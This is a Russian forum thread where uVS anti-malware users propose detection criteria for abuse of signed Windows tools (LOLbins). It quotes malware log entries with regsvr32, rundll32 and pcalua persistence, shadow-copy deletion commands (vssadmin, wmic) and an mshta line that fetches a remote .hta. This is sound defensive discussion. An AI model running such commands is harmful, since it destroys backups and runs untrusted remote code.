Перейти к содержанию

Recommended Posts

PR55.RP55

При попытке повторно сканировать файл на V.T. выдаётся ошибка: HTTP Status Code: 403 ( и уже давно )

при этот просто проверка файлов работает.

----------------

Уточнение к выше написанному по SLUI.EXE

Понятно, что когда файл просто валяется в каталоге uVS его не увидит ( и это нормально )

Но когда запускаешь файл,  открывается окно, обновляешь список, а uVS файл не видит...

Проверил с другими файлами из winsxs

Файл НЕ обнаруживается при его запуске ( обновление списка )

Файл НЕ обнаруживается при повторном запуске uVS ( вне зависимости от типа запуска )

Файл Обнаруживается только при Многократном\повторном запуске.

т.е. если файл запускался 1-2 раза uVS его не видит. 100%.

После ПЯТИ ЗАПУСКОВ ПОДРЯД видит...

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
SQx

Приветствую,

Тут в очередной раз встретил интересную тему на TechNet, касаемо  политики установки приложений .Net Framework. У пользователя на Windows 8.1 при установки  приложений банк-клиента получает сообщение "ваш администратор заблокировал данное приложение, поскольку оно потенциально представляет угрозу вашему компьютеру" далее прерывается установка.

В событиях приложений видно следующее:

Description: Приложение: AlfaDirect.SigningTool.exe
Версия платформы: v4.0.30319
Описание. Процесс был завершен из-за необработанного исключения.
Сведения об исключении: System.Security.Policy.PolicyException
   в System.AppDomain.SetupApplicationHelper(System.Security.Policy.Evidence, System.Security.Policy.Evidence, System.ApplicationIdentity, System.ActivationContext, System.String[])
   в System.AppDomain.InitializeDomainSecurity(System.Security.Policy.Evidence, System.Security.Policy.Evidence, Boolean, IntPtr, Boolean)


Может стоит отслеживать эти настройки в реестре, это бы в некоторых случаях помогло с ложными оповещениями "якобы приложение является потенциально опаснойи представляет угрозу вашему компьютеру".

Что скажете?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

В коде  Microsoft обнаружена ошибка, ( crypt32.dll ) которая отвечает за проверку цифровых  подписей, что потенциально позволяет  подделать подпись файла.

https://krebsonsecurity.com/2020/01/cryptic-rumblings-ahead-of-first-2020-patch-tuesday/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

С выходом новой версии Хрома появились записи типа.

Полное имя                  79.0.3945.130
Имя файла                   79.0.3945.130
Тек. статус                 в автозапуске Chrome/Yandex
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске Chrome/Yandex
                            
Доп. информация             на момент обновления списка
Стартовая страница          Chrome

Образ тема:  https://forum.esetnod32.ru/messages/forum4/topic15670/message108070/?result=reply#message108070


                            

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

demkd, приветствую.

в последнее время, злоумышленники, стремятся обойти защиту в HIPS по блокированию деструктивных действий, в частности удалению теневых копий, переносят удаление в системные задачи.

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\WBEM\WMIC.EXE
Имя файла                   WMIC.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Удовлетворяет критериям     
WMICDELETESHADOWSCOPY       (ССЫЛКА ~ C:\WINDOWS\SYSTEM32\TASKS\)(1)   AND   (CMDLINE ~ SHADOWCOPY DELETE)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     47919524C8000
Linker                      8.0
Размер                      801280 байт
Создан                      19.01.2008 в 09:13:56
Изменен                     19.01.2008 в 11:00:47
                            
TimeStamp                   19.01.2008 в 06:13:56
EntryPoint                  +
OS Version                  0.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            wmic.exe.mui
Версия файла                6.0.6000.16386 (vista_rtm.061101-2205)
Версия продукта             6.0.6000.16386
Описание                    WMI Commandline Utility
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     SHADOWCOPY DELETE
SHA1                        02316B3393A8F06C0D5132937E268BB0D7044835
MD5                         E24706AFDEAF910604BBFF5D514FA3DA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\WMICRESTORE

и

Цитата

Полное имя                  C:\WINDOWS\SYSTEM32\VSSADMIN.EXE
Имя файла                   VSSADMIN.EXE
Тек. статус                 ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
                            
Удовлетворяет критериям     
VSSADMINDELETESHADOWSCOPY   (ССЫЛКА ~ C:\WINDOWS\SYSTEM32\TASKS\)(1)   AND   (CMDLINE ~ DELETE SHADOWS /ALL /QUIET)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ИЗВЕСТНЫЙ ПРОВЕРЕННЫЙ в автозапуске
File_Id                     479198D722000
Linker                      8.0
Размер                      127488 байт
Создан                      19.01.2008 в 09:29:43
Изменен                     19.01.2008 в 11:00:42
                            
TimeStamp                   19.01.2008 в 06:29:43
EntryPoint                  +
OS Version                  0.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Тип файла                   64-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Microsoft Windows
                            
Оригинальное имя            VSSADMIN.EXE.MUI
Версия файла                6.0.6000.16386 (vista_rtm.061101-2205)
Версия продукта             6.0.6000.16386
Описание                    Интерфейс командной строки для Microsoft® Volume Shadow Copy Service
Продукт                     Операционная система Microsoft® Windows®
Copyright                   © Корпорация Майкрософт. Все права защищены.
Производитель               Microsoft Corporation
                            
Доп. информация             на момент обновления списка
CmdLine                     DELETE SHADOWS /ALL /QUIET
SHA1                        51055E07A82F84266A1D594783D785B75452E4D6
MD5                         76A7CD9B76DEA4EF85BB2959F6C36EBA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VSSDATARESTORE

хотелось бы,

1. чтобы в настройках критерия была возможность добавить настраиваемую команду deltsk

2. чтобы была возможность задать приоритет ( для случаев, когда чистый файл используется в деструктивных целях) критерия перед цифровой и безопасным хэшем.
                            

                          

  • Like 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
Цитата

Santy пишет:   для случаев, когда чистый файл используется в деструктивных целях      

https://www.anti-malware.ru/news/2018-07-16-1447/26826

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
В 28.01.2020 at 9:21 PM, santy сказал:

1. чтобы в настройках критерия была возможность добавить настраиваемую команду deltsk 

2. чтобы была возможность задать приоритет ( для случаев, когда чистый файл используется в деструктивных целях) критерия перед цифровой и безопасным хэшем.

посмотрю что там можно сделать, пока с временем проблемы.

  • Like 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
23 минут назад, demkd сказал:

посмотрю что там можно сделать, пока с временем проблемы. 

может в коде программы жестко прописать список системных файлов, через которые возможно выполнить деструктивные действия в системе: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe. И с учетом этого списка уже управлять приоритетом между критериями и белыми хэшами.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

 

Цитата

Santy пишет:  wmic.exe, , cmd.exe, svchost.exe

Можно создать отдельную категорию.

раз это отдельная категория...

 

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
demkd
3 часа назад, santy сказал:

И с учетом этого списка уже управлять приоритетом между критериями и белыми хэшами.

не очень хорошая идея, файлов может быть несколько сотен, а то и тысяч на самом деле

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
43 минут назад, demkd сказал:

не очень хорошая идея, файлов может быть несколько сотен, а то и тысяч на самом деле

пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
2 часа назад, PR55.RP55 сказал:

 

Можно создать отдельную категорию.

раз это отдельная категория...

 

 

 

 

можно  и категорию, это непринципиально, лишь бы не было лишних хлопот с дополнительным программированием.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
13 часов назад, santy сказал:

пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить. 

или так, например, сделать:

ввести категорирование критериев с признаком приоритета критерия над цифровой из белого списка и безопасным хэшем.

например: "деструктивное действие, выполняемое системным файлом".... тогда будет не нужен список чистых файлов с потенциально деструктивным действием. бонус здесь еще будет в том, что можно будет систематизировать критерии по категориям.

но это приведет к модификации справочника критериев, поскольку нужно будет добавить поле выбора категории критерия, и нужен будет дополнительно управляемый список категорий критериев, чтобы установить признак приоритета.

ну, и соответственно, это повлияет на правила отбора объектов в группу "подозрительные и вирусы".

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

santy

Категория: " Системные  Потенциально Деструктивные <--------- "

Можно установить заглушку: "Не проверять файлы в категории по б.с.ЭЦП;  SHA1 " (  settings.ini  )

( Задаётся любая категория. ( или группа категорий ) )

Значит проверка происходит только по базе поисковых критериев. Если критерий не задан, файл всегда отображается в своей категории.

Добавить в Инфо. : "Команда вне типовых значений - Подозрительная команда "

Доп. информация             на момент обновления списка
CmdLine                     DELETE SHADOWS /ALL /QUIET
SHA1                        51055E07A82F84266A1D594783D785B75452E4D6
MD5                         76A7CD9B76DEA4EF85BB2959F6C36EBA
                            
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\VSSDATARESTORE 

т.е. после установки системы и базовых компонентов типа NET Framework; Vcredist и т.д. uVS запоминает типовые значения Инфо. и может сравнивать. ( только для основных файлов )

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

+

В uVS есть категория: " Неизв.модули в изв. процессах. "

А категории: " Неизв. команды в изв. процессах. "

Такой категории нет...

----------

Кроме того пора бы уже уйти от практики: " Тихо сам с собою я веду беседу"

А взять\собрать у всех кто работает с uVS базы\критерии и передать Demkd

Поисковые алгоритмы программы должны развиваться - а какое может быть развитие, если всё оставить как есть.

 

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
3 часа назад, PR55.RP55 сказал:

А взять\собрать у всех кто работает с uVS базы\критерии и передать Demkd

а demkd это надо, разбираться с сотнями записей в списках snms? кому надо, тот спросит или найдет. Ты же публикуешь свои списки. Поделиться можно лишь действительно уникальными критериями, если получается их находить.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Сравнивал очистку в uVS и FRST

Если применить FRST ( EmptyTemp ) сразу после очистки в uVS - то программа всегда находит дополнительно 30-50 mb и PC по ощущениям начинает лучше работать. т.е. нужно в этом направлении _обязательно смотреть.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
В 08.02.2020 at 12:33 PM, santy сказал:

например: "деструктивное действие, выполняемое системным файлом".... тогда будет не нужен список чистых файлов с потенциально деструктивным действием. бонус здесь еще будет в том, что можно будет систематизировать критерии по категориям.

demkd,

можно еще автоматически карантинить подобные файлы из Prefetch, если для них сработал критерий "деструктивное действие, выполняемое системным файлом"

возможно в самом файле *.pf будет содержаться полезная для анализа информация

https://habr.com/ru/company/group-ib/blog/487516/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

Santy пишет:   Пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.       


Техника LOLbins (living off the land), работает используя легитимные процессы Windows для выполнения вредоносного кода, не запуская собственные исполняемые файлы и процессы.
К примеру, по данным Microsoft, малварь регулярно злоупотребляла msiexec.exe, rundll32.exe, schtasks.exe и т.д. Используя эти процессы для запуска вредоносного кода.


regsvr32.exe

O22 - ScheduledTask: (Ready) {300E0444-6E75-00D4-8C2E-786DE3115137} - {root} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\1d479c60\119a6428.dll"
Task: C:\WINDOWS\Tasks\{B1AA8F04-0894-F922-12CF-066671D0E46D}.job => C:\WINDOWS\system32\regsvr32.exe F /s /n /i:/rt C:\DOCUME~1\ALLUSE~1\APPLIC~1\1c89c365\7520cf2e.dll <==== ATTENTION
Task: {9557A449-CB89-49B5-9552-89C8163A54C3} - System32\Tasks\{402A874D-3698-5E16-6CA4-31FE2AC06873} => C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\c8f9210c\cf9bd03d.dll" <==== ATTENTION
O22 - Task: {77108E3C-4C71-191B-AD1B-E1D1F566BF0E} - C:\Windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\bdd75b60\d136dad1.dll"
HKU\S-1-5-21-926217151-4064649387-4294350901-500\...\Run: [Ajjdworks] => regsvr32.exe C:\Users\Администратор\AppData\Local\Ajjdworks\Image.DLL <==== ATTENTION
HKU\S-1-5-21-2939633801-2705330331-3998745655-1001\...\Run: [update_w32.exe] => C:\Windows\system32\regsvr32.exe /s scrrun.dll "D:\Users\Таня\AppData\Roaming\SysplanNT\msimg32.dll" htvrh666 "D:\Users\Таня\AppData\Roaming\SysplanNT\update_w32.exe" r <==== ATTENTION

rundll32.exe

Запуск в командной строке предельно прост — rundll32.exe.
Вызов имени библиотеки DLL происходит без вызова расширения .dll
При этом имя функции выглядит несоответствующим.
В реальности код зловреда запускается одновременно с загрузкой библиотеки DLL.
Бинарный код rundll32.exe, подписанный Windows, копируется в другие локации под именем ******.exe, а затем запускается с помощью той же команды, что и rundll32.exe ранее.

O22 - Task (Ready): BYkucKAbLoZInYF - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\PieSfXRZU\Afbjxp.dll",#1
S2 OtherSearch; rundll32.exe "C:\Program Files (x86)\S9YGPGPPyq\kl.dll",Svc [X] <==== ATTENTION
C:\Program Files (x86)\S9YGPGPPyq\kl.dll
O4 - HKCU\..\Run: [MSIDLL] rundll32.exe msionc32.dll,bQiYtMdJrG
Task: {D70D36C3-72F5-4E28-8622-5F312E2B467B} - System32\Tasks\GAasuBHwSxk => C:\WINDOWS\system32\rundll32.exe


msiexec.exe

HKU\S-1-5-18\...\RunOnce: [IsMyWinLockerReboot] => msiexec.exe /qn /x{voidguid}
Update Manager [20161005]-->MsiExec.exe /I{F428D0FB-765D-40EB-BDD8-A1E7F5C597FA}
globalupdate Helper []-->MsiExec.exe /I{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}


schtasks.exe

schtasks.exe /create /F /tn "123123" /xml "c:\temp\task.xml"
schtasks.exe /run /i /tn "123123"

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy
17 минут назад, PR55.RP55 сказал:

regsvr32.exe

rundll32.exe

ну, regsvr32.exe и rundll32.exe в любом случае засветятся, потому что здесь будет дополнительно отобран в списке объектов файл, который он запускают или регистрируют.

хотя, дополнительно статус "системного файла с деструктивным действием" не помешает в данном случае.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55

cscript.exe

https://tproger.ru/news/winrm-vbs-windows/

https://vms.drweb.com/virus/?i=8365848&lng=en

https://vms.drweb.ru/virus/?i=4154287

O22 - Task: \Microsoft\Windows\Server Manager\CleanupOldPerfLogs - C:\Windows\system32\cscript.exe /B /nologo C:\Windows\system32\calluxxprovider.vbs $(Arg0) $(Arg1) $(Arg2)


mshta.exe

mshta.exe c:\temp.hta
Mshta.exe http://www.******.com/bar.hta

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
santy

wscript.exe, csript.exe, mshta.exe,

так же как regsvr32.exe, rundll32.exe засветят в образе тот отдельный файл, который они выполняют.

---------------------------------

вот еще картинка, как могут быть применены системные файлы в деструктивных действиях.

wmic, bitsadmin:

Программа администрирования BITS (BITS) используется в Windows для загрузки обновлений безопасности. Именно это свойство службы использует киберпреступники, чтобы скрыть свое присутствие на скомпрометированной системе. Еще одна особенность, которая затрудняет предупреждение BITS, заключается в том, что когда опасное приложение загружает файлы с использованием службы, трафик, как представляется, поступает из BITS, а не из приложения.  Возможности злоупотреблений BITS не ограничиваются загрузкой программ. Служба BITS может стать источником утечки информации, если воспользоваться ею для передачи файлов из сети на внешний компьютер

EQ-QkH8U4AAoXTl.png

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
PR55.RP55
Цитата

Santy пишет:  wscript.exe, csript.exe, mshta.exe,

так же как regsvr32.exe, rundll32.exe засветят в образе тот отдельный файл, который они выполняют       

Если файл постоянно доступен -  засветят. А если это сетевой ресурс, или внешний накопитель то...

pcalua.exe

Task: {58E521CE-9E9C-4AF4-8672-055BAB6CC610} - System32\Tasks\{71EFCB4A-AFB7-4A1A-BF03-2C4652886663} => C:\Windows\system32\pcalua.exe -a E:\AUTORUN.EXE -d E:\

Task: {39D66A93-E0D4-460F-90A5-7E254BE62565} - System32\Tasks\{5A56217C-FB4D-4CD2-A83E-6660BC431D40} => pcalua.exe -a E:\qfyh01ww.exe -d E:\

Task: {555780F2-DC30-4C70-8322-E018A752B23C} - System32\Tasks\{E1F14680-765F-4CFE-96F6-07A005324F2D} => C:\Windows\system32\pcalua.exe -a C:\Users\Пользователь\Desktop\tconp.exe -d C:\Users\Пользователь\Desktop

O22 - Task: {467E7092-19D2-4143-B5A8-953C2E358898} - C:\Windows\system32\pcalua.exe -a C:\Temp\jre-8u161-windows-au.exe -d C:\Windows\SysWOW64 -c /installmethod=jau FAMILYUPGRADE=1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • Ego Dekker
    • Ego Dekker
      Антивирусы были обновлены до версии 13.1.16. В числе прочего добавлены совместимость с Windows 10 20H1 и поддержка Windows 10 20H2.
    • Ego Dekker
      Программа для удаления продуктов ESET обновилась до версии 9.0.1.0. Для просмотра всех команд запустите утилиту с параметром /help. 
    • santy
      1. на самом деле можно и не удалять, а редактировать единственный критерий для создания запросов. Было бы только удобно формировать такой запрос.... например, "все объекты с цифровой, которая не входит в белый список". здесь ты одним значением не найдешь их фильтруя все объекты сквозным образом по ИНФО, как минимум необходимо два условия, а значит и два значения вводить для запроса. 2. подсветки нет, но это наверное не самое главное. для скорости анализа важно, (хотя бы строку из инфо, которая соответствует критерию).... когда ИНФО содержит много информации. для формирования скрипта- не критично. 3. старых и новых критериев нет. все действующие. ненужные удалить. хотя может и полезно было бы ставить check "отключить" или "включить" данное правило в базе.
        вся эта работа выполняется на стадии формирования списка объектов автозапуска. все исполняемые файлы, которые встречаются по ссылкам в реестре, в cmdLine, и проч. Если ты набрал в поиске по наименованию "cmd.exe", ты уже нашел данный объект в списке со всей его историей (ИНФО), собранной на стадии формирования образа автозапуска.... в какие параметры, ссылки входит в реестре или в cmdLine. цитата "выше Разве?" взята из предложения по деструктивным действиям чистых файлов, когда эти деструктивные действия находятся с помощью критериев, но чистый хэш снимает статус, подтверждающий дейструктивность действия данного файла в анализируемой системе.
    • PR55.RP55
      Недостатки uVS:
      1) Невозможно задать временный критерий. После поиска созданный критерий нужно удалять... Решение: При создании критерия добавить чек бокс:  НЕ вносить изменений в snms [ V ] 2) В Инфо. нет подсветки по типу поиска в браузере ( подсветить всё найденное ) 3) Поиск идёт по всем критериям -  по старым и по новым. Когда критериев много ( а их много ) такой поиск теряет смысл. Разве ? Нет смысла искать в других полях по: каталог; имя производителя; цифровой подписи; хэш. Напомню:  " Пока что вижу эти: wmic.exe, vssadmin.exe, cmd.exe, svchost.exe + powershell.exe+ netsh.exe конечно, остальные можно по мере поступления добавить.  "      
×